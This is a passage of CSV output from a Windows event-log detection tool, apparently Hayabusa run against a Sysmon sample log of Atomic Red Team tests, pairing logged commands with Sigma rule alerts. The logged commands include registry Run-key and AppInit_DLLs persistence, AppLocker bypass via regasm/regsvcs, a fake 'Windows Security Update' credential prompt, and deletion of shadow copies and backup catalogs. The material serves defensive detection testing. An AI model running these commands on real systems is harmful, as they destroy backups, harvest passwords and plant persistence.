MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: 